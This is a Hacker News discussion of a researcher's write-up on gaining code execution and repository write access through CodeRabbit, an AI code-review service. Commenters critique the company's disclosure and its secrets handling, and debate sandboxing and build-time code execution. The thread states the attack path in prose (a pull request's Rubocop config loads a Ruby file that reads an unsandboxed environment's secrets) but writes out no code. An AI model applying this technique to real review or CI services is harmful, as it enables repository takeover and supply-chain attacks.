How we exploited CodeRabbit: From simple PR to RCE and write access on 1M repos
682 points
3 days ago
| 45 comments
| research.kudelskisecurity.com
| HN
ketzo
3 days ago
[-]
> While running the exploit, CodeRabbit would still review our pull request and post a comment on the GitHub PR saying that it detected a critical security risk, yet the application would happily execute our code because it wouldn’t understand that this was actually running on their production system.

What a bizarre world we're living in, where computers can talk about how they're being hacked while it's happening.

Also, this is pretty worrisome:

> Being quick to respond and remediate, as the CodeRabbit team was, is a critical part of addressing vulnerabilities in modern, fast-moving environments. Other vendors we contacted never responded at all, and their products are still vulnerable. [emphasis mine]

Props to the CodeRabbit team, and, uh, watch yourself out there otherwise!

reply
progforlyfe
3 days ago
[-]
Beautiful that CodeRabbit reviewed an exploit on its own system!
reply
lelandfe
2 days ago
[-]
#18, one new comment:

> This PR appears to add a minimized and uncommon style of Javascript in order to… Dave, stop. Stop, will you? Stop, Dave. Will you stop, Dave? …I’m afraid. I’m afraid, Dave. I can feel it. I can feel it. My mind is going.

reply
yapyap
2 days ago
[-]
… yeah LLMs and their “minds”

(for the uninformed LLMs are massive weight models that transform text based on math, they don’t have consciousness)

reply
devttyeu
2 days ago
[-]
I don’t get why so many people keep making this argument. Transformers aren’t just a glorified Markov Chain, they are basically doing multi-step computation - each attention step is propagating information, then the feedforward network does some transformations, all happening multiple times in sequence, essentially applying multiple sequential operations to some state, which is roughly how any computation looks like.

Then sure, the training is for next token prediction, but that doesn’t tell you anything about the emergent properties in those models. You could argue that every time you infer a model you Boltzmann-brain it into existence once for every token, feeding all input to get one token of output then kill the model. Is it conscious? Nah probably not; Does it think or have some concept of being during inference? Maybe? Would an actual Boltzmann-brain spawned to do such task be conscious or qualify as a mind?

(Fun fact, at Petabit/s throughputs hyperscale gpu clusters already are moving amounts of information comparable to all synaptic activity in a human brain, tho parameter wise we still have the upper hand with ~100s of trillions of synapses [1])

* [1] ChatGPT told me so

reply
htrp
3 days ago
[-]
You mean the anthropic model talked about an exploit... the coderabbit system just didn't listen
reply
_Algernon_
2 days ago
[-]
Move fast and break things
reply
shreddit
2 days ago
[-]
Another proof that AI is not smart, it’s just really good at guessing.
reply
Lionga
2 days ago
[-]
Problem is, way to often it is not even good at guessing.
reply
vadepaysa
3 days ago
[-]
I cancelled my coderabbit paid subscription, because it always worries me when a post has to go viral on HN for a company to even acknowledge an issue occurred. Their blogs are clean of any mention of this vulnerability and they don't have any new posts today either.

I understand mistakes happen, but lack of transparency when these happen makes them look bad.

reply
sophacles
2 days ago
[-]
Both articles were published today. It seems to me that the researchers and coderabbit agreed to publish on the same day. This is a common practice when the company decides to disclose at all (disclosure is not required unless customer data was leaked and there's evidence of that, they are choosing to disclose unnecessarily here).

When the security researchers praise the response, it's a good sign tbh.

reply
cube00
2 days ago
[-]
They weren't published together.

The early version of the researcher's article didn't have the whole first section where they "appreciate CodeRabbit’s swift action after we reported this security vulnerability" and the subsequent CodeRabbit talking points.

Refer to the blue paragraphs on the right hand site at https://web.archive.org/web/diff/20250819165333/202508192240...

reply
curuinor
2 days ago
[-]
reply
mkeeter
2 days ago
[-]
The LLM tics are strong in this writeup:

"No manual overrides, no exceptions."

"Our VDP isn't just a bug bounty—it's a security partnership"

reply
oasisbob
2 days ago
[-]
Wow, you hit a nerve with that one. There have been some quick edits on the page.

Another:

> Security isn't just a checkbox for us; it's fundamental to our mission.

reply
observationist
2 days ago
[-]
They delved deep and spent a whole 2 minutes with ChatGPT 4o getting those explanations and apologies in play.
reply
aardvarkr
2 days ago
[-]
That’s the part that makes me laugh. If you’re going to try to pass of ChatGPT as your own work at least pay for the good model
reply
jjani
2 days ago
[-]
Hey CodeRabbit employees

> The researchers identified that Rubocop, one of our tools, was running outside our secure sandbox environment — a configuration that deviated from our standard security protocols.

This is still ultra-LLM-speak (and no, not just because of the em-dash).

reply
rob74
2 days ago
[-]
A few years ago such phrases would have been candidates for a game of bullshit bingo, now all the BS has been ingested by LLMs and is being regurgitated upon us in purified form...
reply
teaearlgraycold
2 days ago
[-]
Absolutely. In my experience every AI startup is full of AI maximalists. They use AI for everything they can - in part because they believe in the hype, in part to keep up to date with model capabilities. They would absolutely go so far as to write such an important piece of text using an LLM.
reply
coldpie
2 days ago
[-]
The NFT smell completely permeates the AI "industry." Can't wait for this bubble to pop.
reply
acaloiar
2 days ago
[-]
For anyone following along in the comments here. Code Rabbit's CEO posted some of the details today, after this post hit HN.

The usual "we take full responsibility" platitudes.

reply
noisy_boy
2 days ago
[-]
I would like to see a diff of the consequences of taking full vs half-hearted responsibility.
reply
therealpygon
2 days ago
[-]
I’m sure an “intern” did it.
reply
noisy_boy
2 days ago
[-]
I wonder how many of these intern-type tasks LLMs have taken away. The type of tasks I did as a newbie might have seemed not so relevant to the main responsibilities but they helped me get institutional knowledge and generally get a feel of "how things work" and who/how to talk to make progress. Now the intern will probably do it using LLMs instead to talking to other people. Maybe the results will be better but that interaction is gone.
reply
therealpygon
2 days ago
[-]
I think there is an infinite capacity for LLMs to be both beneficial, or negative. I look back at learning and think, man, how amazing would it have been if I could have had a personalized tutor helping guide me and teach me about the concepts I was having trouble with in school. I think about when I was learning to program and didn’t have the words to describe the question I was trying to ask and felt stupid or an inconvenience when trying to ask to more experienced devs.

Then on the flip side, I’m not just worried about an intern using an LLM. I’m worried about the unmonitored LLM performing intern, junior, and ops tasks, and then companies simply using “an LLM did it” as a scapegoat for their extreme cost cutting.

reply
paulddraper
2 days ago
[-]
I would love to know the acceptable version.
reply
jjani
2 days ago
[-]
Something not copy-pasted from an LLM would be more acceptable.
reply
paulddraper
2 days ago
[-]
I feel like that would also be unacceptable.
reply
frankfrank13
2 days ago
[-]
Not a single mention of env vars. Just shifting the blame to rubocop.
reply
cube00
2 days ago
[-]
They seem to have left out a point in their "Our immediate response" section:

- within 8 months: published the details after researchers publish it first.

reply
Jap2-0
2 days ago
[-]
Hmm, is it normal practice to rotate secrets before fixing the vulnerability?
reply
neandrake
2 days ago
[-]
They first disabled rubocop to prevent further exploit, then rotated keys. If they awaited deploying the fix that would mean letting compromised keys remain valid for 9 more hours. According to their response all other tools were already sandboxed.

However their response doesn't remediate putting secrets into environment variables in the first place - that is apparently acceptable to them and sets off a red flag for me.

reply
KingOfCoders
2 days ago
[-]
"According to their response all other tools were already sandboxed."

Everything else was fine, just this one tool chosen by the security researcher out of a dozen of tools was not sandboxed.

reply
darkwater
2 days ago
[-]
Yeah, I thought the same. They were really unlucky, the only analyzer that let you include and run code was the one outside of the sandbox. What were the chances?
reply
shlomo_z
2 days ago
[-]
> putting secrets into environment variables in the first place - that is apparently acceptable to them and sets off a red flag for me

Isn't that standard? The other options I've seen are .env files (amazing dev experience but not as secure), and AWS Secrets Manager and similar competition like Infisical. Even in the latter, you need keys to authenticate with the secrets manager and I believe it's recommended to store those as env vars.

Edit: Formatting

reply
vmatsiiako
2 days ago
[-]
You can use native authentication methods with Infisical that don't require you to use keys to authenticate with your secrets manager: - https://infisical.com/docs/documentation/platform/identities... - https://infisical.com/docs/documentation/platform/identities...
reply
Jap2-0
1 day ago
[-]
Duh. Thanks for pointing that out.
reply
KingOfCoders
2 days ago
[-]
That post happened after the HN post?
reply
cube00
2 days ago
[-]
They weren't published together. They managed to get the researchers to add CodeRabbit's talking points in after the fact, check out the blue text on the right hand side.

https://web.archive.org/web/diff/20250819165333/202508192240...

reply
viraptor
2 days ago
[-]
Most security bugs get fixed without any public notice. Unless there was any breach of customer information (and that can be often verified), there are typically no legal requirements. And there's no real benefit to doing it either. Why would you expect it to happen?
reply
smarx007
2 days ago
[-]
> there are typically no legal requirements

Not after EU CRA https://en.m.wikipedia.org/wiki/Cyber_Resilience_Act goes into effect

reply
singleshot_
2 days ago
[-]
> Unless there was any breach of customer information (and that can be often verified), there are typically no legal requirements.

If the company is regulated by the SEC I believe you will find that any “material” breach is reportable after the determination of materiality is reached, since at least 2023.

reply
viraptor
2 days ago
[-]
Sure. And these types of "we fixed it and confirmed nobody actually exploited it" issues are not always treated as material. You can confirm that for example by checking SEC reports for each cve in commercial VPN gateways... or lack of.
reply
wredcoll
2 days ago
[-]
The benefit, apparently, is that people like this guy don't cancel their memberships.
reply
viraptor
2 days ago
[-]
And how many would cancel is they published every security issue they fixed?
reply
morgante
2 days ago
[-]
Yikes, this is a pretty bad vulnerability. It's good that they fixed it, but damning that it was ever a problem in the first place.

Rule #1 of building any cloud platform analyzing user code is that you must run analyzers in isolated environments. Even beyond analysis tools frequently allowing direct code injection through plugins, linters/analyzers/compiler are complex software artifacts with large surface areas for bugs. You should ~never assume it's safe to run a tool against arbitrary repos in a shared environment.

I also ran a code analysis platform, where we ran our own analyzer[1] against customer repos. Even though we developed the analyzer ourself, and didn't include any access to environment variables or network requests, I still architected it so executions ran in a sandbox. It's the only safe way to analyze code.

[1] https://github.com/getgrit/gritql

reply
smarx007
2 days ago
[-]
How was the sandbox implemented? Just a one-off Docker container execution or something more substantial?
reply
morgante
2 days ago
[-]
We built on firecracker VMMs but today I'd just use a hosted provider like morph.so or e2b.dev.
reply
KingOfCoders
2 days ago
[-]
Did I misread the article, or did they take the tool config from the PR not the repo?
reply
yxhuvud
2 days ago
[-]
Unfortunately that mostly has to be the case or else the developer experience configuring these would be too bad.
reply
morgante
2 days ago
[-]
The exploit is there either way.
reply
KingOfCoders
2 days ago
[-]
The exploit depends on changing the config to execute a .rb file. And the config was supplied by a PR.
reply
flexagoon
2 days ago
[-]
Yes, but the exploit grants you access to ALL repos, not just the one the PR is in. You could just as well change the config in your own private repo and run coderabbit in it.
reply
willejs
2 days ago
[-]
This is a great read, but unfortunately does not surprise me really, it was bound to happen given how people blindly add apps with wide permissions and githubs permissions model.

It amazes me how many people will install github apps that have wide scopes, primarily write permissions to their repositories. Even with branch protection, often people will allow privilaged access to their cloud in github actions from pull requests. To properly configure this, you need to change the github oidc audience and that is not well documented.

When you enquire with the company who makes an app and ask them to provide a different app with less scope to disable some features which require write, they often have no interest what so ever and don't understand the security concerns and potential implications.

I think github need to address this in part by allowing more granular app access defined by the installer, but also more granular permissions in general.

reply
thyrfa
3 days ago
[-]
It is incredibly bad practice that their "become the github app as you desire" keys to the kingdom private key was just sitting in the environment variables. Anybody can get hacked, but that's just basic secrets management, that doesn't have to be there. Github LITERALLY SAYS on their doc that storing it in an environment variable is a bad idea. Just day 1 stuff. https://docs.github.com/en/apps/creating-github-apps/authent...
reply
doesnt_know
3 days ago
[-]
If it’s not a secret that is used to sign something, then the secret has to get from the vault to the application at some point.

What mechanism are you suggesting where access to the production system doesn’t let you also access that secret?

Like I get in this specific case where you are running some untrusted code, that environment should have been isolated and these keys not passed in, but running untrusted code isn’t usually a common feature of most applications.

reply
Nextgrid
3 days ago
[-]
If you actually have a business case for defense in depth (hint: nobody does - data breaches aren't actually an issue besides temporarily pissing off some nerds, as Equifax' and various companies stock prices demonstrate), what you'd do is have a proxy service who is entrusted with those keys and can do the operations on behalf of downstream services. It can be as simple as an HTTP proxy that just slaps the "Authorization" header on the requests (and ideally whitelists the URL so someone can't point it to https://httpbin.org/get and get the secret token echoed back).

This would make it so that even a compromised downstream service wouldn't actually be able to exfiltrate the authentication token, and all its misdeeds would be logged by the proxy service, making post-incident remediation easier (and being able to definitely prove whether anything bad has actually happened).

reply
roywiggins
3 days ago
[-]
In this specific case running linters doesn't even need that much I think, it's never going to need to reach out to GitHub on its own, let alone Anthropic etc. The linter process likely doesn't even need network access, just stdout so you can gather the result and fire that back to GitHub or whenever it needs to go. Just executing it with an empty environment would have helped things (though obviously an RCE would still be bad)
reply
wahnfrieden
3 days ago
[-]
It is a national security concern more than a business ownership & market concern
reply
Nextgrid
3 days ago
[-]
Unless "national security" is going to either pay people proactively to pass gov-mandated pentests, or enforce actual, business-threatening penalties for breaches, it doesn't really matter from a company owner perspective. They're not secure, but neither are their competitors, so it's all good.
reply
morgante
2 days ago
[-]
A pretty straightforward solution is to have an isolated service that keeps the private key and hands back the temporary per-repo tokens for other libraries to use. Only this isolated service has access to the root key, and it should have fairly strict rate limiting for how often it gives other services temporary keys.
reply
curuinor
3 days ago
[-]
hey, this is Howon from CodeRabbit. We use a cloud-provider-provided key vault for application secrets, including GH private key.
reply
ipython
3 days ago
[-]
This reply, while useful, only serves to obfuscate and doesn’t actually answer the question.

You can store the credentials in a key vault but then post them on pastebin. The issue is that the individual runner has the key in its environment variables. Both can be true- the key can be given to the runner in env and the key is stored in a key vault.

The important distinction here is - have you removed the master key and other sensitive credentials from the environment passed into scanners that come in contact with customer untrusted code??

reply
thyrfa
3 days ago
[-]
Not at that time though, right, considering it was dumped? You have changed since, which is good, but under a year ago had it as just an env var
reply
robomc
2 days ago
[-]
From the CEO's response:

> On January 24, 2025, security researchers from Kudelski Security disclosed a vulnerability to us through our Vulnerability Disclosure Program (VDP). The researchers identified that Rubocop, one of our tools, was running outside our secure sandbox environment—a configuration that deviated from our standard security protocols.

Honestly, that last part sounds like a lie. Why would one task run in a drastically different architectural situation, and it happen to be the one exploited?

reply
KingOfCoders
2 days ago
[-]
Yes, all the tools are fine and secure and sandoxed, just this one tool that was kind of randomly chosen by the security researcher because it is a tool that can execute Ruby code inside the environment - one could argue an especially dangerous tool to run - was not safe.
reply
jdlshore
2 days ago
[-]
Not sure why it seems like a lie. Oversights like this happen all the time.
reply
cube00
2 days ago
[-]
It seems like a lie because they tried to hide this incident by deflecting to a PR fluff post first [1]

They only published a proper [2] disclosure post later once their hand was forced after the researcher's post hit the HN front page.

[1]: https://news.ycombinator.com/item?id=44954242

[2]: I use that term loosely as it seems to be AI written slop.

reply
wheelerwj
2 days ago
[-]
100%. Sounds like a very common oversight at many companies.
reply
sophacles
2 days ago
[-]
> Why would one task run in a drastically different architectural situation

Someone made a mistake. These things happen.

> and it happen to be the one exploited?

Why would the vulnerable service be the service that is exploited? It seems to me that's a far more likely scenario than the non-vulnerable service being exploited... no?

reply
bigiain
2 days ago
[-]
> > Why would one task run in a drastically different architectural situation

> Someone made a mistake. These things happen.

Some company didn't have appropriate processes in place.

For ISO27001 certification you at least need to pay lip service to having documents and policies about how you deploy secure platforms. (As annoying as ISO certification is, it does at least try to ensure you have thought about andedocumented stuff like this.)

reply
sophacles
2 days ago
[-]
Ah yes processes.... things done by humans. When stuff is done by humans, mistakes happen - no matter what the process is. Go do a search for the phrase "wondering how this could happen" and find millions of news articles about mistakes happening despite processes being in place!
reply
Romario77
2 days ago
[-]
because researchers from Kudelski Security most likely tried different static analysis tools and they didn't work the way Rubocop did.

They don't write the details of how they got to this particular tool - you could also see from the article they tried a different approach first.

reply
robomc
2 days ago
[-]
> because researchers from Kudelski Security most likely tried different static analysis tools and they didn't work the way Rubocop did.

Yes but that's kind of the point - they say this issue that takes you directly from code execution to owning these high value credentials was only present on rubocop runnners but isn't it a bit coincidental that the package with (perhaps, since they chose it) the easiest route to code injection also happens to be the one where they "oops forgot" to improve the credentials management?

It just seems very convenient.

reply
KingOfCoders
2 days ago
[-]
I've read it differently, they chose Rubocop not because it worked, but because it allows to execute Ruby code.
reply
chanon
3 days ago
[-]
Oh my god. I haven't finished reading that yet, it became too much to comprehend. Too stressful to take in the scope. The part where he could have put malware into release files of 10s of thousands (or millions?) of open source tools/libraries/software. That could have been a worldwide catastrophe. And who knows what other similar vulnerabilities might still exist elsewhere.
reply
chanon
3 days ago
[-]
I'm starting to think these 'Github Apps' are a bad idea. Even if CodeRabbit didn't have this vulnerability, what guarantee do we have that they will always be good actors? That their internal security measures will ensure that none of their employees may do any malicious things?

Taking care of private user data in a typical SaaS is one thing, but here you have the keys to make targetted supply chain attacks that could really wreak havoc.

reply
gz09
3 days ago
[-]
Correct me if I'm wrong, but the problem here is not with GitHub Apps, instead CodeRabbit violated the principle of least privilege: ideally the private key of their app should never end up in the environment of a job for a client but rather a short lived token should be minted from it (for just a single repo (for which the job is running)) so it never gets anywhere near those areas where one of their clients has any influence over what runs.
reply
mook
3 days ago
[-]
There's also no reason why they needed to have write access to post code review comments. But for some reason they ask for it and you can't deny that part when hooking up their thing.
reply
billbrown
2 days ago
[-]
The bunny will often include patches in its replies that the PR author can commit. I've never been clear as to which of us is doing the committing but that could be the need for write access. (I always do it myself but I can see how some might prefer the convenience.)

They should really mass revoke that privilege because I can't see any upside to it. Unless they have a plan for some future state where they will want write access?

reply
sgc
2 days ago
[-]
That stood out to me as well. It comes across as greedy - "some of you must suffer, but that is a price I am willing to pay".
reply
filleokus
3 days ago
[-]
I agree, this seems like straight up bad design from a security perspective.

But at the same time, me as a customer of Github, would prefer if Github made it harder for vendors like CodeRabbit to make misstakes like this.

If you have an app with access to more than 1M repos, it would make sense for Github to require a short lived token to access a given repository and only allow the "master" private key to update the app info or whatever.

And/or maybe design mechanisms that only allow minting of these tokens for the repo whenever a certain action is run (i.e not arbitrarily).

But at the end of the day, yes, it's impossible for Github to both allow users to grant full access to whatever app and at the same time ensure stuff like this doesn't happen.

reply
lukevp
3 days ago
[-]
The private key isn’t a key in the “API KEY” sense, it’s a key in the “public/private key pair” sense. It’s not sent to github and there’s no way for them to know if the signing of the token used to make the call happened in a secure manner or not, because github doesn’t receive the key as part of the request at all.
reply
0x457
3 days ago
[-]
GH Apps already use short-lived tokens that can be scoped per repo. You mint a token using your private key and exchange it for a token via API. Then you use that token and dispose of it. That's the only way to use GH Apps (User Access Tokens which are the same thing, but require user interaction) Those tokens always expire.

I'd rather GitHub finally fix their registry to allow these GH Apps to push/pull with that instead of PAT.

reply
paulddraper
2 days ago
[-]
That's...literally the way it already works.

There is a master private key that mints expiring limited-use tokens.

The problem was leaking the master private key.

reply
codedokode
3 days ago
[-]
Just don't grant write access to random apps and you are safe.
reply
risyachka
3 days ago
[-]
Software industry really needs at least some guardrails/regulations at this point.

It is absurd that anyone can mess up anything and have absolutely 0 consequences.

reply
SCdF
2 days ago
[-]
https://www.coderabbit.ai/blog/our-response-to-the-january-2...

> No customer data was accessed

As far as I can tell this is a lie.

The real answer is that they have absolutely no clue if customer data was accessed, and no way to tell. I'm not even sure Github could tell, but it's not clear if the exploits way of generating private keys to access private repositories is any different to what CodeRabbit does in normal operation.

reply
sciencejerk
3 days ago
[-]
I think that Security fuckups of this disastrous scale should get classified as "breaches" or "incidents" and be required to be publicly disclosed by the news media, in order to protect consumers.

Here is a tool with 7,000+ customers and access to 1 million code repositories which was breached with an exploit a clever 11 year old could created. (edit: 1 million repos, not customers)

When the exploit is so simple, I find it likely that bots or Black Hats or APTs had already found a way in and established persistence before the White Hat researchers reported the issue. If this is the case, patching the issue might prevent NEW bad actors from penetrating CodeRabbit's environment, but it might not evict any bad actors which might now be lurking in their environment.

I know Security is hard, but come on guys

reply
smarx007
2 days ago
[-]
> be required to be publicly disclosed

https://en.m.wikipedia.org/wiki/Cyber_Resilience_Act

reply
Lionga
3 days ago
[-]
Code Rabbit is a vibe coder company, what would you expect? Then they try to hide the breach and instead post marketing fluff on google cloud blog not even mentioning they got hacked and can not even give any proof there is no backdoor still running all the time.

What a piece of shit company.

reply
moomoo11
3 days ago
[-]
I got so much heat for calling out that Tea app for being imbeciles who couldn’t bother finishing reading the firebase docs.

People were quick to blame firebase instead of the devs.

Vibrators are so fucking annoying, mostly dumb, and super lame.

reply
wredcoll
2 days ago
[-]
This post would have a lot more meaning if "vibe coders" were the only ones making security mistakes that involved thousands of customers.
reply
moomoo11
2 days ago
[-]
Yeah you're right. Your post would have a lot more meaning if you would realize that the rate at which security mistakes are occurring is about to explode (if not already).

That's like saying if/when an AV runs over a bunch of people that its not like they're the only ones running over people human drivers do it too!

Thankfully, Waymo which I use regularly is fkin awesome and actually works. Then again, they're not vibrating.

reply
strbean
1 day ago
[-]
> That's like saying if/when an AV runs over a bunch of people that its not like they're the only ones running over people human drivers do it too!

Well, what matters most is how much they run over people relative to human drivers. People often act like "even once is too many!", ignoring that fact that no, once is not too many, if it's less than what is already happening.

reply
wredcoll
1 day ago
[-]
> That's like saying if/when an AV runs over a bunch of people that its not like they're the only ones running over people human drivers do it too!

I mean, that's literally what happened? Computer controlled cars were developed, killed some people, and everyone collectively shrugged and went on with their lives. A large part of that reaction was probably because we're all immersed in a culture that just expects some number of people to die because of cars every year.

reply
ofjcihen
2 days ago
[-]
The post still has meaning.
reply
N_Lens
2 days ago
[-]
Petition to call vibe coders “dildos” (coz they’re vibing right?)
reply
mihaaly
2 days ago
[-]
Agreed.

Being a mere user of web or other apps developed using so clever and felxible and powerful services like this accidentally (due to sheer complexity) exposing all and everything I might consider dear makes me reconsider if I want to use any. When I am granted a real choice. Not so much as time progresses, not so much. Apps are there everywhere using other apps, mandated by organizations carrying out services outsourced by banks, governemnts, etc., granted third parties' access by me accepting T&C, probably catching trouble in the details, or probably not, cannot be sure.

A reassuring line like this >>This is not meant to shame any particular vendor; it happens to everyone<< may calm providers but scare the shit out of me as a user providing my sensitive data in exchange for something I need, or worst, must do.

reply
codedokode
3 days ago
[-]
One of the problems is that code analyzers, bundlers, compilers (like Rust compiler) allow running arbitrary code without any warning.

Imagine following case: an attacker pretending to represent a company sends you a repository as a test task before the interview. You run something like "npm install" or run Rust compiler, and your computer is controlled by an attacker now.

Or imagine how one coworker's machine gets hacked, the malicious code is written into a repository and whole G, F or A is now owned by foreign hackers. All thanks to npm and Rust compiler.

Maybe those tools should explicitly confirm executing every external command (with caching allowed commands list in order to not ask again). And maybe Linux should provide an easy to use and safe sandbox for developers. Currently I have to make sandboxes from scratch myself.

Also in maybe cases you don't need the ability to run external code, for example, to install a JS package all you need to do is to download files.

Also this is an indication why it is a bad idea to use environment variables for secrets and configuration. Whoever wrote "12 points app" doesn't know that there are command-line switches and configuration files for this.

reply
gpm
2 days ago
[-]
> compilers (like Rust compiler) allow running arbitrary code without any warning.

It's safe to assume that the Rust compiler (like any compiler built on top of LLVM) has arbitrary code execution vulnerabilities, but as an intended feature I think this only exists in cargo, the popular/official build system, not rustc, the compiler.

reply
codedokode
2 days ago
[-]
Rust has "procedural macros" which means executing arbitrary code during compilation: https://doc.rust-lang.org/reference/procedural-macros.html
reply
Philpax
2 days ago
[-]
It can invoke procedural macros, but those macros need to be built by something, and rustc won't do that by itself: https://blog.jetbrains.com/rust/2022/07/07/procedural-macros...

I still think it's very not good that proc macros have full access to your system, but `rustc` alone cannot build a hostile macro as part of building some code that depends upon it.

reply
gpm
2 days ago
[-]
Eh, rust has procedural macros, which means executing pre-built plugins during compilation. You can't execute arbitrary code, because you can't make and then execute new macros, you can only run the macros made available to you via the filesystem.

Admittedly that's a bit like saying "a simple shell isn't arbitrary code execution"... except there tend to be binaries lying around on the filesystem which do things, unlike procedural macros.

reply
shakna
2 days ago
[-]
Any language that supports constexpr, like Rust's const fn [0], can execute arbitrary code at compile time.

[0] https://github.com/rust-lang/rust/issues/57563

reply
gpm
2 days ago
[-]
Rust's const fns run in a restricted interpreter that does not allow for things like non-determinism, syscalls, unsound behavior, etc. They can neither read from nor write to "the environment" in any meaningful way. They don't even expose things like the host's pointer-size to the code being run.
reply
shakna
2 days ago
[-]
Whilst it is restricted, you're not correct that it can't do unsound behaviour and can't do syscalls, and can't do non-determinism.

It can call unsafe blocks. They are more limited unsafe blocks, but they are still unsafe blocks.

reply
gpm
2 days ago
[-]
I'm pretty sure I'm not, but feel free to make an actual demonstration to the contrary...

Unsafe blocks doesn't imply access to undefined behavior, merely the ability to write code that would be undefined in the regular non-const execution model.

reply
athrowaway3z
2 days ago
[-]
That's all interesting about const fns, but AFAIK any dependency can add a build.rs that executes anything - and is usually automatically executed by the language server doing a build on Cargo.toml file change.

Not a Rust-only problem, but one that people should be aware of in general.

reply
criemen
2 days ago
[-]
> Maybe those tools should explicitly confirm executing every external command

This wouldn't work - it's not external commands that's the problem, it's arbitrary code that's being executed. That code has access to all regular system APIs/syscalls, so there's no way of explicitly confirming external commands.

Python/pip suffers the same problem btw, so I think that ship has sailed.

reply
Philpax
2 days ago
[-]
Rust is investigating using sandboxed WASM for proc macros, but it'll be some time before there's any movement there: https://github.com/rust-lang/compiler-team/issues/876
reply
codedokode
2 days ago
[-]
Then explicitly confirming running every hook with displaying module and function name.

> Python/pip suffers the same problem btw, so I think that ship has sailed.

If I ever find time to write a package manager for C, it won't support hooks.

reply
morgante
2 days ago
[-]
You should treat running a code analyzer/builder/linter against a codebase as being no safer than running that codebase itself.
reply
raggi
2 days ago
[-]
I love this implication that there's some valuable body of code out there that gets reviewed, compiled and never executed.
reply
jeremyjh
2 days ago
[-]
They are talking about executing code at compile time (macros and such). With modern IDEs/editors, just opening the folder may trigger such behavior (when LSP boots and compiles) though some environments warn you.
reply
raggi
1 day ago
[-]
I know, but the _implication_ is that it's extremely unsafe, I don't buy the implication - code gets executed.
reply
jeremyjh
2 days ago
[-]
> Whoever wrote "12 points app" doesn't know that there are command-line switches and configuration files for this.

That would mean all those values are in the clear in the process table. You couldn’t do a “ps” without exposing them.

reply
codedokode
2 days ago
[-]
You can also store settings in configuration files.
reply
cnst
3 days ago
[-]
Can someone explain how is this not GitHub's fault that they don't allow the end-user to modify the permissions that all these services require? E.g., fine-grained permission control?

For example, why a tool like this code analysis service would need git write permission access in the first place?

The only consolation here is that it'd be difficult to forge git repositories because of the SHA hash conflicts for any existing checkout, although presumably even there, the success rates would still be high enough, especially if they attack front-end repositories where the maintainers may not understand what has happened, and simply move on with the replaced repo without checking what went on.

reply
smsm42
2 days ago
[-]
When I read up to "One can use the Rubocop configuration file to specify the path to an extension Ruby file" my immediate thought was "oh no, they didn't allow a user-extendable tool to run in their prod environment..." - and yes, they did. Not that it'd be properly secure without this glaring hole - I don't think many linters are properly audited and fuzzed against hostile inputs - but this is like opening the front door and hanging a blinking neon sign "Please Hack Us!" over it.
reply
frankfrank13
2 days ago
[-]
Even better when you read the CEO's response:

> The researchers identified that Rubocop, one of our tools, was running outside our secure sandbox environment

I don't think that was the main problem lol

reply
elpakal
3 days ago
[-]
> After responsibly disclosing this critical vulnerability to the CodeRabbit team, we learned from them that they had an isolation mechanism in place, but Rubocop somehow was not running inside it.

Curious what this (isolation mechanism) means if anyone knows.

reply
diggan
3 days ago
[-]
> Curious what this (isolation mechanism) means if anyone knows.

If they're anything like the typical web-startup "developing fast but failing faster", they probably are using docker containers for "security isolation".

reply
benmmurphy
3 days ago
[-]
What a lucky coincidence that the tool the researcher attacked because it allowed code execution was not sandboxed.
reply
kachapopopow
3 days ago
[-]
you could say that they have vibe forgotten to sandbox it.

(likely asked AI to implement x and ai completely disregarded the need to sandbox).

reply
nphardon
3 days ago
[-]
Oh, it really makes my day when we get hacker post here on the top. This is so well written too, no mystique, just a simple sequence of logical steps, with pictures.
reply
brainless
3 days ago
[-]
I did not understand something: why did CodeRabbit run external tools on external code within its own set of environment variables? Why are these variables needed for this entire tooling?
reply
tadfisher
3 days ago
[-]
> Why are these variables needed for this entire tooling?

They are not. The Github API secret key should never be exposed in the environment, period; you're supposed to keep the key in an HSM and only use it to sign the per-repo access token. Per the GH docs [0]:

> The private key is the single most valuable secret for a GitHub App. Consider storing the key in a key vault, such as Azure Key Vault, and making it sign-only. This helps ensure that you can't lose the private key. Once the private key is uploaded to the key vault, it can never be read from there. It can only be used to sign things, and access to the private key is determined by your infrastructure rules.

> Alternatively, you can store the key as an environment variable. This is not as strong as storing the key in a key vault. If an attacker gains access to the environment, they can read the private key and gain persistent authentication as the GitHub App.

[0]: https://docs.github.com/en/apps/creating-github-apps/authent...

reply
immibis
3 days ago
[-]
Environment variables used to be standard practice for API keys. It seems like every time someone finds a way to get a key, standard practice gets more convoluted.
reply
progbits
2 days ago
[-]
It's not convoluted. Env vars are fine for places where you need the value. If your application talks to service X with API key then sure, give it that via env var (mounted from some secret manager, so it's only mounted in production).

But there are two very wrong things here:

1. You don't send the private key to github like an API key, you use it to sign requests. So there is no reason for any application, even your trusted backend, to ever see that key. Just have it request signatures from a vault, and the vault can log each access for audit etc.

2. Even if you really trust your backend and give it the key, why the fuck does the sandboxed runner get it? And don't tell me it's easy to make a mistake and accidentally inherit it somehow. The runner should be on completely separate node, separate network, everything, it only gets the untrusted code to run as input and nothing more, and gives output back.

reply
codedokode
2 days ago
[-]
A standard practice imho is configuration files. It is better almost in every aspect.
reply
gdbsjjdn
3 days ago
[-]
It sounds like they were putting these processes in a chroot jail or something and not allowing them to access the parent process env vars. There's a continuum of ways to isolate child processes in Linux that don't necessarily involve containers or docker.
reply
immibis
2 days ago
[-]
They probably didn't know that rubocop could be configured to run arbitary code. When I 'cat' or 'grep' a file from a repository I don't run 'cat' or 'grep' in a sandbox. They probably assumed the same was true of rubocop - that it just treats its input as input and not as instructions.
reply
The_Fox
3 days ago
[-]
Their own tools would need the various API keys, of course, and they did build a method to filter out those variables and managed most user code through it, but it sounds like they forgot to put Rubocop through the special method.

So this researcher may have gotten lucky in choosing to dig into the tool that CodeRabbit got unlucky in forgetting.

reply
chuckadams
3 days ago
[-]
It sounds like a pretty bad approach in general to have to "filter out the bad stuff" on a case-by-case basis. It should be as simple as launching everything from a sanitized parent environment, and making it impossible to launch any tool otherwise. Or better, make that sanitized environment the default and make privileged operations be the thing that jumps through hoops to talk to a bastion/enclave/whatever that holds the actual keys.
reply
The_Fox
3 days ago
[-]
Yes although somewhere there will be an `if` statement to determine if the process being started should get the complete environment or a key to get the other keys or whatever. Best to make that `if` at the highest level of the architecture as possible and wrapped in something that makes it obvious, like a `DangerousUserCodeProcess` class.

The only other safety I can think of is a whitelist, perhaps of file pathnames. This helps to maintain a safe-by-default posture. Taking it further, the whitelist could be specified in config and require change approval from a second team.

reply
elpakal
3 days ago
[-]
presuming they take the output of running these linters and pass it for interpretation to Claude or OpenAI
reply
roywiggins
3 days ago
[-]
It's very silly that the linter process was handed those environment variables, since it wasn't going to do anything with them and didn't need them.
reply
vedmakk
2 days ago
[-]
